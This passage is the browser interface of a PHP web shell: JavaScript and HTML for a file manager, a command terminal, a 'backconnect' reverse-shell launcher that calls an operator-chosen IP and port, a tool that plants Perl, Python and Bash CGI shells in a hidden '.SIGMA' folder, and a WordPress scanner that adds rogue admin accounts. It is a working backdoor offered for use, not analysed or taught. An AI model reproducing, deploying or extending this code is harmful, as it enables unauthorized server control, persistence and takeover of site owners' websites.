onclick="addWordPressAdmin()" class="btn btn-success" style="width:100%">Add Admin User</button> </div> </div> </div> </div> </div> <!-- Command Shell --> <div class="shell-section"> <div class="shell-header">Terminal</div> <div class="shell-input"> <input type="text" id="cmdInput" placeholder="Enter command..." 
onkeypress="if(event.keyCode==13) executeCommand()"> <button onclick="executeCommand()" class="btn btn-primary">Execute</button> <button onclick="clearOutput()" class="btn">Clear</button> </div> <div class="shell-output" id="shellOutput"></div> </div> </div> <!-- Modals --> <div id="uploadModal" class="modal"> <div class="modal-content"> <div class="modal-header"><h3>Upload File</h3><span class="close" onclick="closeModal('upload')">×</span></div> <form id="uploadForm" enctype="multipart/form-data"> <div class="form-group"><label>Select File</label><input type="file" name="file" required></div> <div class="modal-footer"> <button type="button" onclick="closeModal('upload')" class="btn">Cancel</button> <button type="submit" class="btn btn-primary">Upload</button> </div> </form> </div> </div> <div id="mkdirModal" class="modal"> <div class="modal-content"> <div class="modal-header"><h3>Create Directory</h3><span class="close" onclick="closeModal('mkdir')">×</span></div> <form id="mkdirForm"> <div class="form-group"><label>Directory Name</label><input type="text" name="dir_name" required></div> <div class="modal-footer"> <button type="button" onclick="closeModal('mkdir')" class="btn">Cancel</button> <button type="submit" class="btn btn-success">Create</button> </div> </form> </div> </div> <div id="mkfileModal" class="modal"> <div class="modal-content" style="min-width:600px"> <div class="modal-header"><h3>Create File</h3><span class="close" onclick="closeModal('mkfile')">×</span></div> <form id="mkfileForm"> <div class="form-group"><label>File Name</label><input type="text" name="file_name" required></div> <div class="form-group"><label>Content</label><textarea name="content" rows="10"></textarea></div> <div class="modal-footer"> <button type="button" onclick="closeModal('mkfile')" class="btn">Cancel</button> <button type="submit" class="btn btn-warning">Create</button> </div> </form> </div> </div> <div id="renameModal" class="modal"> <div class="modal-content"> <div 
class="modal-header"><h3>Rename</h3><span class="close" onclick="closeModal('rename')">×</span></div> <form id="renameForm"> <input type="hidden" name="old_path" id="old_path"> <div class="form-group"><label>New Name</label><input type="text" name="new_path" id="new_path" required></div> <div class="modal-footer"> <button type="button" onclick="closeModal('rename')" class="btn">Cancel</button> <button type="submit" class="btn btn-primary">Rename</button> </div> </form> </div> </div> <div id="chmodModal" class="modal"> <div class="modal-content"> <div class="modal-header"><h3>Change Permissions</h3><span class="close" onclick="closeModal('chmod')">×</span></div> <form id="chmodForm"> <input type="hidden" name="path" id="chmod_path"> <div class="form-group"><label>Permissions (e.g., 0755)</label><input type="text" name="perms" id="chmod_perms" required pattern="[0-7]{4}" placeholder="0755"></div> <div class="modal-footer"> <button type="button" onclick="closeModal('chmod')" class="btn">Cancel</button> <button type="submit" class="btn btn-primary">Change</button> </div> </form> </div> </div> <div id="editModal" class="modal"> <div class="modal-content" style="min-width:800px"> <div class="modal-header"><h3>Edit File: <span id="editFileName"></span></h3><span class="close" onclick="closeModal('edit')">×</span></div> <form id="editForm"> <input type="hidden" name="file_path" id="edit_path"> <div class="form-group"><textarea name="content" id="edit_content" style="min-height:400px"></textarea></div> <div class="modal-footer"> <button type="button" onclick="closeModal('edit')" class="btn">Cancel</button> <button type="submit" class="btn btn-success">Save</button> </div> </form> </div> </div> <div id="deleteModal" class="modal"> <div class="modal-content"> <div class="modal-header"><h3>Confirm Delete</h3><span class="close" onclick="closeModal('delete')">×</span></div> <p id="deleteMessage" style="margin:20px 0; color:#e0e0e0;"></p> <form id="deleteForm"> <input 
type="hidden" name="path" id="delete_path"> <div class="modal-footer"> <button type="button" onclick="closeModal('delete')" class="btn">Cancel</button> <button type="submit" class="btn btn-danger">Delete</button> </div> </form> </div> </div> <script> let currentDir = '<?php echo addslashes($cwd); ?>'; let wpSites = []; // Utility Functions function showAlert(msg, type = 'success') { const alert = document.createElement('div'); alert.className = `alert ${type}`; alert.textContent = msg; document.body.appendChild(alert); setTimeout(() => alert.remove(), 3000); } function showModal(type) { document.getElementById(type + 'Modal').style.display = 'block'; } function closeModal(type) { document.getElementById(type + 'Modal').style.display = 'none'; } function showTab(tab) { document.querySelectorAll('.tab-content').forEach(t => t.classList.add('hidden')); document.getElementById('tab-' + tab).classList.remove('hidden'); document.querySelectorAll('.tab-btn').forEach(btn => btn.classList.remove('active')); event.target.classList.add('active'); if (tab === 'files') loadFileList(); } function toggleTool(header) { header.classList.toggle('collapsed'); header.nextElementSibling.classList.toggle('collapsed'); } // File Manager Functions function loadFileList() { const tbody = document.getElementById('fileList'); tbody.innerHTML = '<tr><td colspan="6" style="text-align:center; padding:40px;"><span class="spinner"></span> Loading...</td></tr>'; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=list&dir=' + encodeURIComponent(currentDir) }) .then(r => r.json()) .then(data => { if (data.success && data.data) { renderFileList(data.data); } }); } function renderFileList(items) { let html = ''; if (currentDir !== '/') { html += '<tr><td colspan="6"><a href="#" onclick="changeDir(\'' + currentDir.substring(0, currentDir.lastIndexOf('/')) + '\')" class="dir">.. 
(Parent Directory)</a></td></tr>'; } items.forEach(item => { const size = item.type === 'dir' ? '-' : formatSize(item.size); const date = new Date(item.mtime * 1000).toLocaleString('en-US', { year:'numeric', month:'2-digit', day:'2-digit', hour:'2-digit', minute:'2-digit', second:'2-digit' }); const path = encodeURIComponent(item.path); const name = encodeURIComponent(item.name); html += '<tr data-path="' + item.path + '" data-type="' + item.type + '">'; html += '<td style="max-width:200px; overflow:hidden; text-overflow:ellipsis;">'; if (item.type === 'dir') { html += '<a href="#" onclick="changeDir(\'' + item.path + '\')" class="dir">' + item.name + '/</a>'; } else { html += '<span class="file" title="' + item.name + '">' + item.name + '</span>'; } html += '</td>'; html += '<td class="size">' + size + '</td>'; html += '<td class="perms">' + item.perms + '</td>'; html += '<td>' + item.owner + '/' + item.group + '</td>'; html += '<td style="font-size:11px;">' + date + '</td>'; html += '<td><div class="actions-cell">'; if (item.type === 'file') { html += '<button onclick="editFile(\'' + path + '\')" class="action-btn edit" title="Edit">Edit</button>'; html += '<button onclick="downloadFile(\'' + path + '\')" class="action-btn download" title="Download">Get</button>'; } html += '<button onclick="renameItem(\'' + path + '\', \'' + name + '\')" class="action-btn rename" title="Rename">Rnm</button>'; html += '<button onclick="chmodItem(\'' + path + '\', \'' + item.perms + '\')" class="action-btn perms" title="Chmod">Mod</button>'; html += '<button onclick="deleteItem(\'' + path + '\')" class="action-btn delete" title="Delete">Del</button>'; html += '</div></td></tr>'; }); document.getElementById('fileList').innerHTML = html; } function formatSize(bytes) { if (bytes >= 1073741824) return (bytes / 1073741824).toFixed(2) + ' GB'; if (bytes >= 1048576) return (bytes / 1048576).toFixed(2) + ' MB'; if (bytes >= 1024) return (bytes / 1024).toFixed(2) + ' KB'; return bytes + ' 
B'; } function changeDir(path) { currentDir = path; window.history.pushState({}, '', '?dir=' + encodeURIComponent(path)); loadFileList(); const parts = path.split('/').filter(p => p); let html = '<a href="#" onclick="changeDir(\'/\')">~</a>'; let p = ''; parts.forEach(part => { p += '/' + part; html += ' / <a href="#" onclick="changeDir(\'' + p + '\')">' + part + '</a>'; }); document.getElementById('currentPath').innerHTML = html; } function refreshDir() { loadFileList(); } function goUp() { changeDir(currentDir.substring(0, currentDir.lastIndexOf('/')) || '/'); } function renameItem(path, name) { path = decodeURIComponent(path); name = decodeURIComponent(name); document.getElementById('old_path').value = path; document.getElementById('new_path').value = path.substring(0, path.lastIndexOf('/') + 1) + name; showModal('rename'); } function deleteItem(path) { document.getElementById('delete_path').value = decodeURIComponent(path); document.getElementById('deleteMessage').textContent = 'Delete: ' + decodeURIComponent(path) + '?'; showModal('delete'); } function chmodItem(path, perms) { document.getElementById('chmod_path').value = decodeURIComponent(path); document.getElementById('chmod_perms').value = perms; showModal('chmod'); } function editFile(path) { path = decodeURIComponent(path); document.getElementById('edit_path').value = path; document.getElementById('editFileName').textContent = path.split('/').pop(); fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=read&file=' + encodeURIComponent(path) }) .then(r => r.json()) .then(data => { if (data.success) { document.getElementById('edit_content').value = data.data; showModal('edit'); } else { showAlert('Error loading file', 'error'); } }); } function downloadFile(path) { window.open('?action=download&file=' + path, '_blank'); } // Command Execution function executeCommand() { const cmd = 
document.getElementById('cmdInput').value; if (!cmd) return; const output = document.getElementById('shellOutput'); output.innerHTML += '<div style="color: #4a9eff;">$ ' + cmd + '</div>'; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=cmd&cmd=' + encodeURIComponent(cmd) + '&cwd=' + encodeURIComponent(currentDir) }) .then(r => r.json()) .then(data => { if (data.success) { output.innerHTML += '<div>' + (data.data || '').replace(/\n/g, '<br>') + '</div>'; } else { output.innerHTML += '<div style="color: #e74c3c;">Error: ' + data.message + '</div>'; } output.scrollTop = output.scrollHeight; }) .catch(e => output.innerHTML += '<div style="color: #e74c3c;">Error: ' + e + '</div>'); document.getElementById('cmdInput').value = ''; } function clearOutput() { document.getElementById('shellOutput').innerHTML = ''; } // Backconnect function backConnect() { const type = document.getElementById('bc_type').value; const ip = document.getElementById('bc_ip').value; const port = document.getElementById('bc_port').value; if (!ip || !port) { showAlert('IP and Port required', 'error'); return; } showAlert('Sending backconnect to ' + ip + ':' + port + ' using ' + type + '...', 'success'); fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=backconnect&type=' + type + '&ip=' + ip + '&port=' + port }) .then(r => r.json()) .then(data => { if (data.success) { showAlert(data.message, 'success'); } else { showAlert(data.message, 'error'); } }); } // CGI Shell (di folder .SIGMA) function createCGI(type) { let path; if (type === 'perl') path = document.getElementById('cgi_perl_path').value; else if (type === 'python') path = document.getElementById('cgi_python_path').value; else if (type === 'bash') path = document.getElementById('cgi_bash_path').value; if (!path) { showAlert('Path required', 'error'); 
return; } fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=cgi&cgi_type=' + type + '&cgi_path=' + encodeURIComponent(path) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert(data.message + ' in .SIGMA folder', 'success'); const container = document.getElementById('cgiIframeContainer'); const iframe = document.getElementById('cgiIframe'); const link = document.getElementById('cgiIframeLink'); iframe.src = data.full_url; link.href = data.full_url; container.style.display = 'block'; container.scrollIntoView({ behavior: 'smooth' }); } else { showAlert(data.message, 'error'); } }); } // WordPress (FIXED) function scanWordPress() { const path = document.getElementById('wp_scan_path').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=wp_scan&path=' + encodeURIComponent(path) }) .then(r => r.json()) .then(data => { if (data.success) { if (data.sites && data.sites.length > 0) { wpSites = data.sites; const select = document.getElementById('wp_sites'); select.innerHTML = ''; data.sites.forEach(site => { const option = document.createElement('option'); option.value = site; option.textContent = site; select.appendChild(option); }); document.getElementById('wp_sites_container').style.display = 'block'; document.getElementById('wp_form').style.display = 'block'; document.getElementById('wp_count_badge').textContent = 'Found ' + data.sites.length + ' WordPress installation(s)'; showAlert('Found ' + data.sites.length + ' WordPress sites', 'success'); } else { document.getElementById('wp_sites_container').style.display = 'none'; document.getElementById('wp_form').style.display = 'none'; showAlert('No WordPress sites found (wp-load.php missing)', 'error'); } } }); } function addWordPressAdmin() { const select = document.getElementById('wp_sites'); const path = 
select.value; const user = document.getElementById('wp_user').value; const pass = document.getElementById('wp_pass').value; const email = document.getElementById('wp_email').value; if (!path || !user || !pass || !email) { showAlert('All fields required', 'error'); return; } showAlert('Creating admin user...', 'success'); fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=wp_add&wp_path=' + encodeURIComponent(path) + '&username=' + encodeURIComponent(user) + '&password=' + encodeURIComponent(pass) + '&email=' + encodeURIComponent(email) }) .then(r => r.json()) .then(data => { showAlert(data.message, data.success ? 'success' : 'error'); if (data.success) { // Clear form document.getElementById('wp_user').value = ''; document.getElementById('wp_pass').value = ''; document.getElementById('wp_email').value = ''; } }); } // Form Handlers document.getElementById('uploadForm')?.addEventListener('submit', e => { e.preventDefault(); const fd = new FormData(); fd.append('action', 'upload'); fd.append('path', currentDir); fd.append('file', document.querySelector('#uploadForm input[type=file]').files[0]); fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest' }, body: fd }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Uploaded successfully'); closeModal('upload'); loadFileList(); } else { showAlert('Upload failed', 'error'); } }); }); document.getElementById('mkdirForm')?.addEventListener('submit', e => { e.preventDefault(); const dir = currentDir + '/' + document.querySelector('#mkdirForm input[name=dir_name]').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=mkdir&dir=' + encodeURIComponent(dir) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Directory created'); closeModal('mkdir'); loadFileList(); } else { 
showAlert('Creation failed', 'error'); } }); }); document.getElementById('mkfileForm')?.addEventListener('submit', e => { e.preventDefault(); const file = currentDir + '/' + document.querySelector('#mkfileForm input[name=file_name]').value; const content = document.querySelector('#mkfileForm textarea[name=content]').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=mkfile&file=' + encodeURIComponent(file) + '&content=' + encodeURIComponent(content) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('File created'); closeModal('mkfile'); loadFileList(); } else { showAlert('Creation failed', 'error'); } }); }); document.getElementById('renameForm')?.addEventListener('submit', e => { e.preventDefault(); const old = document.getElementById('old_path').value; const newPath = document.getElementById('new_path').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=rename&old=' + encodeURIComponent(old) + '&new=' + encodeURIComponent(newPath) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Renamed'); closeModal('rename'); loadFileList(); } else { showAlert('Rename failed', 'error'); } }); }); document.getElementById('deleteForm')?.addEventListener('submit', e => { e.preventDefault(); const path = document.getElementById('delete_path').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=delete&path=' + encodeURIComponent(path) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Deleted'); closeModal('delete'); loadFileList(); } else { showAlert('Delete failed', 'error'); } }); }); document.getElementById('chmodForm')?.addEventListener('submit', e => { e.preventDefault(); const path = 
document.getElementById('chmod_path').value; const perms = document.getElementById('chmod_perms').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=chmod&path=' + encodeURIComponent(path) + '&perms=' + perms }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Permissions changed'); closeModal('chmod'); loadFileList(); } else { showAlert('Chmod failed', 'error'); } }); }); document.getElementById('editForm')?.addEventListener('submit', e => { e.preventDefault(); const file = document.getElementById('edit_path').value; const content = document.getElementById('edit_content').value; fetch('', { method: 'POST', headers: { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'action=save&file=' + encodeURIComponent(file) + '&content=' + encodeURIComponent(content) }) .then(r => r.json()) .then(data => { if (data.success) { showAlert('Saved'); closeModal('edit'); } else { showAlert('Save failed', 'error'); } }); }); window.onclick = e => { document.querySelectorAll('.modal').forEach(m => { if (e.target === m) m.style.display = 'none'; }); }; // Load initial file list loadFileList(); </script> </body> </html>